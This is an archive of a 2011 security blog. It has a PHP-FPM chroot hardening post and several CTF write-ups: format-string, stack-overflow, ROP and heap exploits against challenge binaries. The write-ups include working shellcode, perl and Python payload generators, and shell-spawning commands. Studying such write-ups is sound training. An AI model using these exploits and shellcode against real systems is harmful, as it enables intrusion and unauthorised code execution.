Sunday, October 16, 2011

Chroot PHP-FPM and Apache

As mentioned in "A Note on Security in PHP", the PHP security features (safe_mode, open_basedir, disable_functions) can be bypassed. The Stefan Esser’s paper also describe how to bypass the PHP security features. The better alternative for PHP security is chroot PHP-FPM.

With google, you can easily find how to configure PHP-FPM for nginx. But I want the setup for Apache httpd. I found only this two "Install Drupal in php-fpm (fastcgi) with Apache and a chroot php-fpm" and "The Perfect LAMP Stack – Apache2, FastCGI, PHP-FPM, APC". They explain very well for configuring fastcgi and PHP-FPM. But only first link describe about chroot PHP. The method to chroot is somewhat ugly. Why do I have to create a symlink?

After reading Apache and PHP doc, I found the options. We just need to set "doc_root" to a new web path after chrooted and "cgi.fix_pathinfo" to 0 in "php.ini". We can also set these options per PHP-FPM pool with "php_admin_value" directive.


Updated on 11 Aug 2012

Note: I just notice the _SERVER variables related to path are wrong if "cgi.fix_pathinfo" is 0. If PHP application relies on these variables (such as _SERVER["SCRIPT_FILENAME"], $_SERVER["PATH_TRANSLATED"]), it would fail.

Another method is patching PHP-FPM. Here is my quick and dirty patch for PHP 5.3.15 http://pastebin.com/4EFqEgwE. I added "cgi.fix_chrootpath" configuration. Just set it to the same value as "chroot" value in pool configuration. Do not set "doc_root" and "cgi.fix_pathinfo". The "cgi.fix_chrootpath" should be boolean. But I cannot find a method to access "chroot" pool configuration. Last, I did not test the patch much. It works on my Linux box.


Also do not forget to remove "FollowSymLinks" or add "SymLinksIfOwnerMatch" option in Apache httpd configuration. If you omit it, the attacker can use symlink() trick to read files that web user can read.

After doing chroot PHP, you might think the open_basedir and disable_fuctions are useless. In my opinion, open_basedir is still useful. They can prevent from PHP functions to read files from "upload_tmp_dir" and "session.save_path". So attacker cannot use "temporary upload file" and "session file" for LFI.

Last thing that only few people mention, noexec mount option can be used for web data if web application use only PHP.

Tuesday, September 27, 2011

CSAW CTF 2011 - Exploitation Bin4 Writeup

After reading repnzscasb's Bin4 write-up. I have to say to myself "why I missed overwriting the pointer to function?". Here is my solution (not a smart method to solve this challenge).

The challenge code is same as bin3 but bin4 is compiled with full RELRO. Also the ASLR is enabled. Here is a short C code.

int s(char *op, char *lhs, char *rhs){
  static int(*opfunc)(int, int);
  int(*matfunc[4])(int, int) = {&add, &sub, &mul, &divi};
  char opmsg[512];

  op++;
  //...
 
  snprintf(opmsg, sizeof(opmsg), op);
  printf("%s\n", opmsg);
  fflush(0);
  return opfunc(atoi(lhs), atoi(rhs));
}
 
int main(int argc, char **argv){
 
  if(argc < 4){ u(); }
 
  printf("Result: %d\n", s(argv[2], argv[1], argv[3]));
  exit(EXIT_SUCCESS);
}

Assume we see only format string bug (do not see opfunc, a pointer to function :P). My idea is using saved ebp in s() stack frame, that points to saved ebp in main() stack frame, with format string bug to modify 1 byte of saved ebp in main() stack frame to the address of saved eip in s() stack frame. Confused??? Look below.

(gdb) b *0x0804867e     # break at call snprintf
Breakpoint 1 at 0x804867e
(gdb) r 1 -%144\$hhn 2
Starting program: /home/worawit/csaw/bin4 1 -%144\$hhn 2
Operation:
Breakpoint 1, 0x0804867e in s ()
(gdb) x/12x $ebp
0xbffff648:     0xbffff668      0x08048721      0xbffff868      0xbffff866
0xbffff658:     0xbffff872      0x0029bff4      0x08048750      0x00000000
0xbffff668:     0xbffff6e8      0x00155e37      0x00000004      0xbffff714
(gdb) ni
0x08048683 in s ()
(gdb) x/12x $ebp
0xbffff648:     0xbffff668      0x08048721      0xbffff868      0xbffff866
0xbffff658:     0xbffff872      0x0029bff4      0x08048750      0x00000000
0xbffff668:     0xbffff600      0x00155e37      0x00000004      0xbffff714

Note:
- 0xbffff648 is address of saved ebp in s() stack frame
- 0xbffff64c is address of saved eip in s() stack frame
- 0xbffff668 is address of saved in main() stack frame

From gdb, we can see the saved ebp value in main() stack frame is changed. If we change it to address of saved eip in s() stack frame, 0xbffff64c. We can use it for format string bug to change the saved eip in s() stack frame. That's the idea.

This method does not work all the time because stack address is random. But the chance is not low. Only 4 bits are random. The last 4 bits are always the same because of stack alignment in main() function.

080486e5 <main>:
 80486e5:       55                      push   %ebp
 80486e6:       89 e5                   mov    %esp,%ebp
 80486e8:       83 e4 f0                and    $0xfffffff0,%esp

Because argv[1] is passed to s() function as 2nd argument , we just need to modified the saved eip to the pop/ret address. Find it near 0x08048721, so we have to modified only 1 byte.

worawit@nattyvm:~/csaw$ objdump -d ./bin4 | grep '^ 80487' | grep -B 1 ret
 8048743:       5d                      pop    %ebp
 8048744:       c3                      ret
--
 80487a8:       5d                      pop    %ebp
 80487a9:       c3                      ret
 80487aa:       8b 1c 24                mov    (%esp),%ebx
 80487ad:       c3                      ret
--
 80487d8:       5d                      pop    %ebp
 80487d9:       c3                      ret
--
 80487f6:       c9                      leave
 80487f7:       c3                      ret

I pick address 0x080487a8. The restriction of this method is "$" modifier must not be used in first "%n"

. Else the printf() function will not use modified value. Here is the exploit. Shell will pop out in a second.

worawit@nattyvm:~/csaw$ while [ 1 ]; do ./bin4 `perl -e 'print "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80"'` -`perl -e 'print "%8x"x142,"%220x%hhn","%8x"x6,"%44x%hhn"'` 10; done
...
$

Saturday, September 3, 2011

ROP with common functions in Ubuntu/Debian x86

After reading "How to make a ROP when gadgets seems to miss ? (kind of universal ROP under linux)", I see something missing. It is hard to change the shellcode (such as connect back) and it does not work on full RELRO binary. So I tried do ROP too (for fun) with following code and compilation option on Ubuntu 10.04 (x86).

#include <string.h>
int main(int argc, char **argv)
{
    char buf[64];
    strcpy(buf, argv[1]);
    return 0;
}
$ gcc -fno-stack-protector -Wl,-z,relro,-z,now -o testfoo testfoo.c
$ checksec.sh --file testfoo
RELRO           STACK CANARY      NX            PIE                     FILE
Full RELRO      No canary found   NX enabled    No PIE                  testfoo

Here the "objdump -d" output (testfoo_objdump.txt). I will paste only gadgets here because the full output is very long.

From agix's work, he modified GOT entry to get new gadgets. It cannot be used when full RELRO is enabled. But we still can use "call *%eax" (or similar) to make a new gadgets.

Even a binary is full RELRO, there is still static memory address that permission is "rw" (at least .data and .bss section). When a binary file is mapped to memory, the memory must be allocated a multiple of page size (normally is 4096 bytes). So in most case, there are some unused memory area that is initialized to zero. I will use this memory area to store some value.

Let look at gadgets in __libc_csu_init first.

# gadget #1
 8048472:	83 c4 1c             	add    $0x1c,%esp
 8048475:	5b                   	pop    %ebx
 8048476:	5e                   	pop    %esi
 8048477:	5f                   	pop    %edi
 8048478:	5d                   	pop    %ebp
 8048479:	c3                   	ret 

This gadget can be used for setting ebx, esi, edi, ebp and clean up stacks.

# gadget #2
 8048439:	8d bb 0c ff ff ff    	lea    -0xf4(%ebx),%edi
 804843f:	8d 83 0c ff ff ff    	lea    -0xf4(%ebx),%eax
 8048445:	29 c7                	sub    %eax,%edi
 8048447:	c1 ff 02             	sar    $0x2,%edi
 804844a:	85 ff                	test   %edi,%edi
 804844c:	74 24                	je     8048472 <__libc_csu_init+0x52>

This gadget can be used for setting eax after setting ebx. The 0xf4 is offset of _GLOBAL_OFFSET_TABLE_ and __init_array_start.

# gadget #3
 8048450:	8b 45 10             	mov    0x10(%ebp),%eax
 8048453:	89 44 24 08          	mov    %eax,0x8(%esp)
 8048457:	8b 45 0c             	mov    0xc(%ebp),%eax
 804845a:	89 44 24 04          	mov    %eax,0x4(%esp)
 804845e:	8b 45 08             	mov    0x8(%ebp),%eax
 8048461:	89 04 24             	mov    %eax,(%esp)
 8048464:	ff 94 b3 0c ff ff ff 	call   *-0xf4(%ebx,%esi,4)
 804846b:	83 c6 01             	add    $0x1,%esi
 804846e:	39 fe                	cmp    %edi,%esi
 8048470:	72 de                	jb     8048450 <__libc_csu_init+0x30>

This gadget can be used for calling a function, based on ebx and esi, with 3 arguments. We need to set edi to make jb condition fail. But limitation of this gadget is we must know the address of function arguments.

Next, gadgets in __do_global_ctors_aux

# gadget #4
 80484a7:	5b                   	pop    %ebx
 80484a8:	5d                   	pop    %ebp
 80484a9:	c3                   	ret  

This gadget can be used for setting ebx and use a little stack space.

# gadget #5
(gdb) x/6i 0x0804849e
   0x804849e <__do_global_ctors_aux+30>:        add    -0xb8a0008(%ebx),%eax
   0x80484a4 <__do_global_ctors_aux+36>:        add    $0x4,%esp
   0x80484a7 <__do_global_ctors_aux+39>:        pop    %ebx
   0x80484a8 <__do_global_ctors_aux+40>:        pop    %ebp
   0x80484a9 <__do_global_ctors_aux+41>:        ret
   0x80484aa <__do_global_ctors_aux+42>:        nop

This gadget cannot be found in objdump output. I use gdb to intrepret at address 0x0804849e as instructions. It can be used for adding value from memory to eax. Because we can control eax, it is considered as load value from memory to eax (similar to "mov (%ebx),%eax" instruction).

Next, gadgets in __do_global_dtors_aux.

# gadget #6
(gdb) x/3i 0x080483a9
   0x80483a9 <__do_global_dtors_aux+73>:        add    $0x804a008,%eax
   0x80483ae <__do_global_dtors_aux+78>:        add    %eax,0x5d5b04c4(%ebx)
   0x80483b4 <__do_global_dtors_aux+84>:        ret

This gadget also can be found with gdb at address 0x080483a9. The "add %eax,0x5d5b04c4(%ebx)" instruction can be used for storing eax value to memory if the value in memory is 0 (similar to "mov %eax,(%ebx)"). When wanting to avoid badchars from setting eax, we use this whole gadget to adjust eax.

I also found this gadet in in __do_global_dtors_aux with gdb.

(gdb) x/2i 0x08048392
   0x8048392 <__do_global_dtors_aux+50>:        add    %esp,0x804a00c(%ebx)
   0x8048398 <__do_global_dtors_aux+56>:        call   *0x8049ef8(,%eax,4)

It can be used for storing esp to memory. But because 0x804a00c (dtor_idx) is near to static memory address, ebx has to be very low value (0x0000????). I cannot find a gadget to adjust ebx. So we cannot use it if \x00 is badchar (like this example).

These are 6 gadgets I use to do ROP. Let see my python code for the variable name of the gadget addresses.

# start address of __do_global_dtors_aux
do_global_dtors_aux_addr = 0x08048360

# start address of __libc_csu_init
libc_csu_init_addr = 0x08048420
init_array_offset = 0xf4
bss_completed_addr = 0x0804a008

# start address of __do_global_ctors_aux
do_global_ctors_aux_addr = 0x08048480

set_eax_addr = libc_csu_init_addr + 0x19    # gadget #2
set_4reg_addr = libc_csu_init_addr + 0x55   # gadget #1
call_3args_addr = libc_csu_init_addr + 0x30 # gadget #3

set_ebx_addr = do_global_ctors_aux_addr + 0x27  # gadget #4
load_eax_addr = do_global_ctors_aux_addr + 0x1e # gadget #5

store_eax_addr = do_global_dtors_aux_addr + 0x4e  # gadget #6
store_eax_addr2 = do_global_dtors_aux_addr + 0x49 # can be used for avoiding badchars

JUNK = 0xbadc0de
JUNK_STR = pack("<I", JUNK)

Here how I use these gadgets. Start with simple set eax and ebx.

def do_set_ebx(ebx):
    # 12 bytes
    return pack("<III", set_ebx_addr, ebx, JUNK)

def do_set_eax_ebx(eax, ebx, esi=JUNK, edi=JUNK, ebp=JUNK):
    # (3+1+7+4)*4 = 60 bytes
    ebx_tmp = (eax + init_array_offset) & 0xFFFFFFFF
    return do_set_ebx(ebx_tmp) + pack("<I", set_eax_addr) + JUNK_STR*7 + pack("<IIII", ebx, esi, edi, ebp)

Next is storing value in memory. Common task.

def do_store_value(value, mem_addr):
    # 64 bytes
    eax = value
    ebx = (mem_addr - 0x5d5b04c4) & 0xFFFFFFFF
    return do_set_eax_ebx(eax, ebx) + pack("<I", store_eax_addr)
do_add_memref = do_store_value

def do_store_value2(value, mem_addr):
    # 64 bytes
    eax = (value - bss_completed_addr) & 0xFFFFFFFF
    ebx = (mem_addr - 0x5d5b04c4) & 0xFFFFFFFF
    return do_set_eax_ebx(eax, ebx) + pack("<I", store_eax_addr2)
do_add_memref2 = do_store_value2

Before seeing next functions, let think about the goal first. I need the ROP to be reusable with other shellcode, so the goal is calling mprotect (I use mprotect because it requires only 3 arguments) and copying the shellcode into rwx area. Looking at gadget #3, we need 3 arguments in memory and the function address to be called in memory too. So we need to put the mprotect function address in memory. To find the mprotect address, we need to get value from GOT entry, then add/sub an offset. Here is the function to do this task.

def do_store_func_addr(func_plt_got_addr, func_offset, mem_addr):
    # 80 bytes
    eax1 = (func_offset - bss_completed_addr) & 0xFFFFFFFF
    ebx1 = func_plt_got_addr + 0x0b8a0008  # normally got is in 0x08??????, so no overflow
    ebx2 = (mem_addr - 0x5d5b04c4) & 0xFFFFFFFF
    return do_set_eax_ebx(eax1, ebx1) + pack("<IIII", load_eax_addr, JUNK, ebx2, JUNK) + pack("<I", store_eax_addr2)

The last function is calling with 3 arguments.

def do_call_3arg(func_mem_addr, args_mem_addr):
    esi = 0x02020202
    ebx = (func_mem_addr + init_array_offset - (esi*4)) & 0xFFFFFFFF
    ebp = args_mem_addr - 8
    edi = 0x01010101  # to make jb condition fail
    return pack("<IIIII", set_4reg_addr, ebx, esi, edi, ebp) + pack("<I", call_3args_addr) + JUNK_STR*11

We have all functions. Time to assemble them to call mprotect.
Note: I have to store the mprotect arguments in memory first because they always contain \x00 value (badchar for this example).

rop = ""
# prepare mprotect address and its arguments on static stack
rop += do_store_func_addr(libc_ref_func_got, mprotect_offset, static_mem_zero_start)  # memprotect address in libc
rop += do_store_value(static_mem_rw_start, static_mem_zero_start + 8)
rop += do_store_value2(mprotect_len, static_mem_zero_start + 12)
rop += do_store_value2(7, static_mem_zero_start + 16)  # rwx
# call mprotect
rop += do_call_3arg(static_mem_zero_start, static_mem_zero_start + 8)

After got the memory with rwx permission, there are many methods to execute any shellcode. I inject a gadget to set strcpy src address in stack.

# metasm > lea eax,[esp+0x10]
# "\x8d\x44\x24\x10"
# metasm > mov [esp+0xc],eax
# "\x89\x44\x24\x0c"
# metasm > ret
# "\xc3"
rop += do_store_value(0x1024448d, static_mem_zero_start + 20)
rop += do_store_value(0x0c244489, static_mem_zero_start + 24)
rop += do_store_value(0x909090c3, static_mem_zero_start + 28)

Then I use strcpy@plt to copy the shellcode and jump to it.

rop += pack("<IIIII", static_mem_zero_start + 20, strcpy_plt, static_mem_zero_start + 32, static_mem_zero_start + 32, JUNK)
rop = "A"*64 + pack("<I", ret_addr)*5 + rop + shellcode

Here is my full python code: genrop.py. Now we can change shell easily :).

$ python genrop.py
$ ./testfoo "`cat rop.out`"

I also tried on Ubuntu 11.04 and Debian 6. It works. But on Fedora 14/15, the __do_global_dtors_aux is slightly different. Gadget #6 is changed to use ecx and ebp for storing value in memory. I cannot find any gadget to control ecx. I think we can use gadgets in libc by using "call *%eax". It is harder but still possible.

Saturday, June 11, 2011

Defcon 19 Quals - Pwntent Pwnables 500 Writeup

I could not solve this challenge in time. It is definitely a good challenge (and hard).

The binary is compiled from C++ code and stripped. Even the binary is dynamically linked, we will see many functions in assembly because some code of C++ STL is included in binary. From objdump output, the binary is compiled on Fedora 14. So I tested my exploit only on Fedora 14. Here are some checking output.

$ file pp500_e98c4e1c448e706a94e
pp500_e98c4e1c448e706a94e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped
$ strings pp500_e98c4e1c448e706a94e
...
_ZSt29_Rb_tree_insert_and_rebalancebPSt18_Rb_tree_node_baseS0_RS_
...
vector::_M_insert_aux
...
$ objdump -s -j .comment pp500_e98c4e1c448e706a94e

pp500_e98c4e1c448e706a94e:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 2028474e 55292034 2e352e31  GCC: (GNU) 4.5.1
 0010 20323031 30303932 34202852 65642048   20100924 (Red H
 0020 61742034 2e352e31 2d342900           at 4.5.1-4).
$ checksec.sh --file pp500_e98c4e1c448e706a94e
RELRO           STACK CANARY      NX            PIE                     FILE
No RELRO        No canary found   NX enabled    No PIE                  pp500_e98c4e1c448e706a94e

The assembly from C++ code is very difficult to understand at first sight. The good way to understand (for me) is writing simple C++ code that uses std::string, then compile it and view the assembly (without stripping). Here is the my C++ code for learning std::string teststring.cpp.

After understanding std::string in assembly, reading the assembly code is a lot easier. There are still many unknown functions. But I could at least understand the program flow.

In upload_new_record function, there is a call to "new" after receiving the data from client. I can guess the call functions after "new" are Class constructors. In both constructor, they call the same function. It is a parent constructor. I also can see the vtable in constructor.

I named the class as RecordOdd and RecordEven (from the random value before creating the Record object). Inside RecordEven::setBuffer, there is a overflow bug. The buffer is allocated 224 bytes but the function always write 248 bytes. I thought to use it to overwrite the vtable of adjacent record. So just need to find a way to trigger it. I could guess almost immediately, the setBuffer is called when we edit a record. But that's not enough because it causes a heap corruption.

There are some messy functions. I could guess only they are STL functions and its object is in .bss section. I saw the "vector" and "Rb_tree". So the program must use std::vector and some kind of STL container that use Red-Black tree as internal data structure. Again, I wrote simple C++ code for each container. The binary use std::map. Here is my C++ code testmap.cpp

After I knew the program use std::map to store the Record and use a object id as a key, it is not difficult to reverse the left code. Here is my the reversed C++ code pp500_code.cpp

Exploitation

I tried to look at memory, when doing "upload new record". I found there is a some data of Red-black tree after a new record. If I use the overflow bug, I would overwrite the Red-black tree data, not vtable of next record.

It might be possible to overwrite the Red-black tree data in order to modify the pointer to Record, then make it points to fake vtable area. I think it is difficult to do. IMHO, playing with heap chunk is easier.

To make the Record allocated after another Record without any data in the middle, I upload a new record and delete it to make a hole (free chunk). Then, upload another record to lock the hole. The heap layout after above steps should look like this (omit heap metadata).

---+------------+--------------+-----------
   | free chunk |   Record 1   |           
---+------------+--------------+-----------

The "free chunk" should be big enough for many Red-black tree data but too small for a Record. So a new Record will be allocated next to Record1.

I need RecordEven object to be able to overwrite vtable of next Record. I do looping the "upload new record", "view record" and "delete record" (if it is not RecordEven) until got RecordEven object. Now, I could modify the vtable pointer :). The left problem is the address of Record that contained fake vtable.

In "edit_record" function, the received data is copied to Record buffer. The received length is ignored. The RecordOdd::setBuffer() use length that defined since "upload new record" to determine how many data to be copied. So if we can make the received buffer in "edit record" contains the address of heap, the program will copy the address to RecordOdd buffer. Then, we can get the address from "view record". (Not use RecordEven::setBuffer() because it causes a heap corruption.)

In "upload_new_record" function, there is a pointer to new Record. It is in buffer space of "edit_record" function, so we can copied a new uploaded Record to RecordOdd data.

When overwriting the vtable, we also need to put correct heap metadata (only chunk size) to prevent heap corruption. The last, I use "edit_record" function to trigger the exploit because it receives data from client to buffer before calling the function from fake data, so I put ROP data in stack.

The left part is doing ROP. Here is my exploit to get shell pp500.py (Note: you need to copy "/bin/sh" and needed libraries in pwn400 home directory because the program does chroot.)

I also write the exploit to just read the "key" file. It does not need to know the function offset in libc. pp500_readkey.py

$ python pp500_readkey.py
creating a hole ...
!!! Got odd record, it might be failed !!!

creating a record to lock the hole ...

creating third record...
getting the Record address...
08fb50e4,08fb5024,00000001,d06a93c2,08fb52d8,43434344

Record address: 08fb5100

overwriting vtable...
trigger the exploit

sending key
waiting for key

dummy key for testing       áP8PÇO♥           XáN N√

Wednesday, June 8, 2011

Defcon 19 Quals - Pwntent Pwnables 400 Writeup

As usual, I checked the file first.

$ file pp400_804703cc7f7d5d3f54ba
pp400_804703cc7f7d5d3f54ba: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
$ objdump -s -j .comment pp400_804703cc7f7d5d3f54ba

pp400_804703cc7f7d5d3f54ba:     file format elf32-i386

Contents of section .comment:
 0000 4743433a 2028474e 55292034 2e362e30  GCC: (GNU) 4.6.0
 0010 20323031 31303530 39202852 65642048   20110509 (Red H
 0020 61742034 2e362e30 2d372900 4743433a  at 4.6.0-7).GCC:
 0030 2028474e 55292034 2e362e30 20323031   (GNU) 4.6.0 201
 0040 31303230 35202852 65642048 61742034  10205 (Red Hat 4
 0050 2e362e30 2d302e36 2900               .6.0-0.6).

The binary in this challenge is statically linked and stripped. It means all libc functions are included in the binary and symbol names are stripped. From the comment section, the binary is supposed to be compiled on Fedora 15. I tried to create IDA sig file from "libc.a" but no function name is resolved. So I have to reverse code manually.

My trick for reversing code on this challenge is starting from "/dev/urandom". The function that passed "/dev/urandom" as first argument should be "open". If we follow the assembly code in "open" function, we will see setting SYS_OPEN to eax then jump to "__unified_syscall" (See my pCTF - Another Samll Bug writeup). So we can recover many libc function names that setting eax to syscall number.

The left libc functions are not difficult to guess if we know function arguments and what syscall to be called inside the function. The code I get is same as LeetMore's writeup but they use better variable name than me (so read their code).

From the code, program copies client data to saved eip address but there is a limit. Before thinking how to make payload small, I checked the enabled security feature in the binary.

$ checksec.sh --file pp400_804703cc7f7d5d3f54ba
RELRO           STACK CANARY      NX            PIE                     FILE
No RELRO        No canary found   NX disabled   No PIE                  pp400_804703cc7f7d5d3f54ba

NX is disabled. So I do not need to do full ROP, just put the code to read the shellcode to some static rwx area (with "fread") then jump to it. Also we can see from the code that stdin and stderr are the connected socket, so we just need the execve("/bin/sh") shellcode.

fread_addr = 0x08048c60
stdin_addr = 0x0804a31c
wx_addr = 0x0804a480

payload = pack("<I", fread_addr) # jump to fread
payload += pack("<I", wx_addr)   # jump to shellcode
payload += pack("<IIII", wx_addr, 1, len(sc), stdin_addr) # fread arguments

It requires only 24 bytes. But when I got the shell, I could use only builtin commands, no "id, cat, ls, ..." (I hope I did not make a mistake again). So I wrote the shellcode to read key file. Here is the full python code pp400.py.

Monday, June 6, 2011

Defcon 19 Quals - Pwntent Pwnables 200 Writeup

First, I checked the binary with various commands

$ file pp200_64625bc51c5b8dc75b
pp200_64625bc51c5b8dc75b: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), stripped
$ strings pp200_64625bc51c5b8dc75b
...
SUNW_0.7
libc.so.1
SUNW_0.9
SUNWprivate_1.1
...
$ objdump -s -j .comment pp200_64625bc51c5b8dc75b

pp200_64625bc51c5b8dc75b:     file format elf32-i386

Contents of section .comment:
 0000 00402823 2953756e 4f532035 2e313020  .@(#)SunOS 5.10
 0010 47656e65 72696320 4a616e75 61727920  Generic January
 0020 32303035 00004028 23295375 6e4f5320  2005..@(#)SunOS
 0030 352e3130 2047656e 65726963 204a616e  5.10 Generic Jan
 0040 75617279 20323030 35000040 28232953  uary 2005..@(#)S
 0050 756e4f53 20352e31 30204765 6e657269  unOS 5.10 Generi
 0060 63204a61 6e756172 79203230 30350000  c January 2005..
 0070 4743433a 2028474e 55292033 2e342e33  GCC: (GNU) 3.4.3
 0080 20286373 6c2d736f 6c323130 2d335f34   (csl-sol210-3_4
 0090 2d627261 6e63682b 736f6c5f 72706174  -branch+sol_rpat
 00a0 68290000 4743433a 2028474e 55292033  h)..GCC: (GNU) 3
...

From output, we know this binary is for Solaris x86. The "file" command tell the binary is stripped but it is not. When I open it in IDA, all function name is resolved. So it is easy to read/guess the code.

The challenge is so straightforward. The program receives input from client then jump to the received buffer+1. Just send the shellcode.

I had no knowledge about writing shellcode for Solaris. So I tried with metasploit "solaris/x86/shell_reverse_tcp". The size is 91 bytes but the BUFSIZE is 0x49=73 bytes. The metasploit payload is too big for this challenge.

I planned to sending small shellcode to receiving big shellcode. My trick is reusing the code. Pushing the size to be received then jump to address 0x080516b4 in order to make program call recvAll with my size then jump to received buffer+1 again. So the first shellcode is

sc = "\x6a\x5c"   # push 92
sc += "\xb8\xb4\x16\x05\x08" # mov eax,0x080516b4 
sc += "\xff\xe0"  # jmp eax

The full python code is pp200_readAll.py

The above method, I failed to do it in CTF because I put the wrong BUFSIZE in python code. Then, I learnt writing shellcode for Solaris x86 and tried connection reuse. I failed again because of my stupid mistake :[. I ended up with writing shellcode to read key file. Here is the python code for reading key file pp200.py.

After loading OpenSolaris VMWare image as someguy (sorry I cannot remember the name) in irc gave me the link, I know why I failed to get the shell. Thanks for the link.

The key, I cannot remember. :P

Thursday, April 28, 2011

Plaid CTF 2011#19 - Another Small Bug

This challenge is local stack based buffer overflow. The binary is static. It means that the libc shared object is not loaded, all needed libc functions are included in the binary. So we cannot use a trick that create a weird executable file name and jump to exec*() function in libc.

Because the NX bit in binary is disabled, the method I used in competition is brute forcing same as Leet More's writeup. But while talking in IRC, it seems the organizer did a mistake. The NX bit should be enabled. The StalkR's Blog has already posted the nice writeup if NX is enabled. I also tried it assuming NX is enabled (and effective :P) just for fun. Here is my solution.

Let see the code first. The main() function of this challenge is small. So I posted here.

int main(int argc, char **argv)
{
    char buffer[512];
    unsigned long len;
    if (argc != 2) {
        printf("...");
        exit(1);
    }
    len = strtoul(argv[1]);
    if (len <= 511) {
        if (log_error("..."))
            myexit();
    }
    fgets(buffer, len, stdin);
    puts(buffer);
    return 0;
}

At first time I looked, it seems not able to be exploited. When I checked inside log_error() function, it always fails because the log file does not exist. So we can put any length we want.

Because the binary is statically linked, so let check what libc functions are included in binary.

$ objdump -t exploitme  | grep .text
...
08048890 g     F .text  00000011 printf
08049fa8 g     F .text  00000043 memmove
...
08049abc g     F .text  0000000e mmap
...
0804823f g     F .text  00000034 __unified_syscall
...
08048230 g     F .text  00000007 mprotect

There are many interesting functions. But "__unified_syscall" is the most interesting for me. It looks like syscall() function in libc. Let look at it closer.

$ gdb ./exploitme
...
(gdb) b main
Breakpoint 1 at 0x804818a
(gdb) r
Starting program: /opt/pctf/z2/exploitme

Breakpoint 1, 0x0804818a in main ()
(gdb) x/10i __unified_syscall
0x804823f <__unified_syscall>:  movzbl %al,%eax
0x8048242 <__unified_syscall+3>:        push   %edi
0x8048243 <__unified_syscall+4>:        push   %esi
0x8048244 <__unified_syscall+5>:        push   %ebx
0x8048245 <__unified_syscall+6>:        mov    %esp,%edi
0x8048247 <__unified_syscall+8>:        mov    0x10(%edi),%ebx
0x804824a <__unified_syscall+11>:       mov    0x14(%edi),%ecx
0x804824d <__unified_syscall+14>:       mov    0x18(%edi),%edx
0x8048250 <__unified_syscall+17>:       mov    0x1c(%edi),%esi
0x8048253 <__unified_syscall+20>:       mov    0x20(%edi),%edi

The function moves arguments to ebx, ecx, edx, esi, edi respectively. Look like it is preparing for syscall. Check some existed libc function that matches the syscall.

(gdb) x/2i open
0x80489d0 <__libc_open>:        mov    $0x5,%al
0x80489d2 <__libc_open+2>:      jmp    0x804823f <__unified_syscall>

Yes, it is. The "__unified_syscall" is a syscall() function but we have to put syscall number in eax before calling it.

I want to call execve syscall (number 11) so all I have to prepare the arguments and set eax to 11. Preparing the arguments is easy because we can control the content in stack. How we set eax to 11?. Normally it is difficult to find "pop eax" gadget. To overcome this problem, I use printf() function. Because eax keeps the return value of function. And the return section in printf man page:

Upon successful return, these functions return the number of characters printed (not including the trailing '\0' used to end output to strings).

Just need to find a string that length is 11. Very easy.

(gdb) x/10s 0x0804a378
0x804a378:       "a"
0x804a37a:       "/home/z2/logs/assert.log"
0x804a393:       "ERROR: %s\n"
0x804a39e:       "%s requires one arguments.\n"
0x804a3ba:       ""
0x804a3bb:       ""
0x804a3bc:       "[assertion] len < sizeof(buffer)"
0x804a3dd:       "/dev/urandom"
0x804a3ea:       "\n"
0x804a3ec:       "(null)"

I use address 0x804a3de ("dev/urandom") for printf() and 0x804a378 ("a") for execve(). The address contains NULL is 0x804a444. Time to exploit it :).

z2_82@a5:~$ ln -s /bin/sh a
z2_82@a5:~$ (perl -e 'print "A"x516,"\x2f\x82\x04\x08"x16,"\x90\x88\x04\x08","\x3f\x82\x04\x08","\xde\xa3\x04\x08","\x78\xa3\x04\x08","\x44\xa4\x04\x08"x2';echo;cat) | /opt/pctf/z2/exploitme 700
AAAAAAAAAAAAAA...
id
uid=2081(z2_82) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users)

Another fun ;)

Monday, April 25, 2011

Plaid CTF 2011 Hashcalc2 Writeup

This challenge is similar to hashcalc1. I used the same method as hashcalc1 to solve it. So read my hashcalc1 writeup first.

The binary uses inetd for running as network service. So the socket fds are 0,1,2. We do not need dup2() like hashcalc1. Also, the calculating hash function is changed. No calling any libc function.

The next libc function call is vsprintf(). But we cannot use it because the GOT entry address is 0x08049108. The address plus 2 is 0x0804910a. 0x0a is bad char.

The next function is strlen() again :). But the program calls vsprintf() with buffer size only is 0x100. To be safe, we should not overflow it. My workaround of this problem is put 0x00 after format string payload. Like this.

payload = payload_fmt + "\x00" + "A"*(0x2e0-len(payload_fmt)-1)

Another weird problem I found is server receive only partial modified GOT table. So I modified it to do recv() 2 times with small data as needed.

The others are same as hashcalc1. Here is my exploit: hashcalc2.py

$ python hashcalc2.py
** Welcome to the online hash calculator **
$
payload len: 840
got GOT table: 104
uid=1008(hashcalc2) gid=1009(hashcalc2) groups=1009(hashcalc2)

funkyG_1S_th3_b3$t

Key: funkyG_1S_th3_b3$t

Plaid CTF 2011 Hashcalc1 Writeup

This challenge is remote pwnable. I spent a lot of time to solve it. But I learned something new (worth to waste time on it). Here is some binary info.

$ checksec.sh --file hashcalc1
RELRO           STACK CANARY      NX            PIE                     FILE
No RELRO        Canary found      NX enabled    No PIE                  hashcalc1

Reversing the binary... it is classic accept() and fork() server. After the connection established, the server send() welcome message, do recv() the data, log to file, calculate hash, then send the hash back to client. The log to file step has a format string problem. The C code should look like this.

recv(sock_fd, buffer, 0x3ff, 0);
// ...
fprintf(log_fp, buffer);

Note: after receiving data from client, the server converts all '\n' (0x0a) to NULL (0x00). So 0x0a is bad char. But 0x00 is good char.

The format string bug is obviously allow us to write any value in arbitrary address. The common place is GOT entry. I found strlen() function is used after fprintf() function (in calculating hash function). So strlen GOT entry is my target.

$ objdump -R hashcalc1 | grep strlen
0804a41c R_386_JUMP_SLOT   strlen

The address to be overwritten is 0x0804a41c. But the problem is what value I have to write. I tried to do connect back with ROP (but not brute forcing). No luck, I cannot find the gadgets to do what I want :(.

After a few hour past, I noticed the socket fd is known. In accept() loop, the server process always call close() before do accept() again. So it always be 5 because 3 is server fd and 4 is log fd.

With known socket fd, we can do ROP to make server send and receive additional data to arbitrary address. We can jump (not call) to recv() or send() by using plt functions. So the fixed addresses of recv() and send() are

$ objdump -d hashcalc1 | grep '@plt>:' | grep -e recv -e send
08048844 <recv@plt>:
